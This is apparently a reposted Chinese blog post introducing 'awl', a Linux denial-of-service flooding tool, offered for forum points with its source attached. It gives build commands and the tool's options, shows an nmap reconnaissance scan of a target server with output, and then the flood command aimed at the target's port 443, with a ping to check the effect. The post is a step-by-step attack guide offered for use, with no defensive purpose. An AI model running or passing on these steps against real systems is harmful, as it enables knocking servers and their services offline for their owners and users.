標籤:linux 伺服器 local
awl簡介:
之所以要這麼多豆豆是因為這個方法真的很給力,值這個價.下面是攻擊步驟,附件裡是awl的源碼包。一,安裝:tar -zxvf awl-0.2.tar.gz./configuremake make installawl的執行程式安裝後...
之所以要這麼多豆豆是因為這個方法真的很給力,值這個價.下面是攻擊步驟,附件裡是awl的源碼包。
一,安裝:
tar -zxvf awl-0.2.tar.gz
./configure
make
make install
註:如果編譯不正確,請按照提示安裝所需軟體,比如:gcc-c++
awl的執行程式安裝後在/usr/local/bin/目錄下
二,說明:
awl 的格式如下:
./awl -i eth0 -m aa:bb:cc:dd:ee:ff -d ip -p port
參數如下:
-i 發送包的介面,如果省略預設是eth0
-m 被攻擊機器的mac地址,程式不能根據被攻擊IP得到MAC,需要手工指定.先ping 目標IP,再arp -a就可以看到.如果省略則為ff:ff:ff:ff:ff:ff
-d 被攻擊機器的IP
-p 被攻擊機器的連接埠.
三,測試,
伺服器端:centOS 5.0
對方伺服器:freebsd 6.2 運行apache
1,首先得知對方IP
運行nmap -v -A 192.168.0.1 查看對方開了啥服務
[[email protected] bin]# nmap -v -A 10.122.89.106
Starting Nmap 4.11 ( http://www.insecure.org/nmap/ ) at 2008-06-02 19:24 CST
DNS resolution of 1 IPs took 0.39s.
Initiating SYN Stealth Scan against 10.122.89.106 [1680 ports] at 19:24
Discovered open port 21/tcp on 10.122.89.106
Discovered open port 25/tcp on 10.122.89.106
Discovered open port 22/tcp on 10.122.89.106
Discovered open port 443/tcp on 10.122.89.106
Discovered open port 80/tcp on 10.122.89.106
Discovered open port 199/tcp on 10.122.89.106
Discovered open port 110/tcp on 10.122.89.106
Discovered open port 143/tcp on 10.122.89.106
Discovered open port 3306/tcp on 10.122.89.106
得知對方開了如上連接埠
ping 192.168.0.1 得知mac地址
查看arp -a 得知對方IP的MAC地址
2.開始攻擊:
./awl -i eth0 -m aa:bb:cc:dd:ee:ff -d 192.168.0.1 -p 443
ping 192.168.0.1 -t 查下對方反應
本文出自 “系統及安全技術” 部落格,轉載請與作者聯絡!
linux下的DoS軟體awl介紹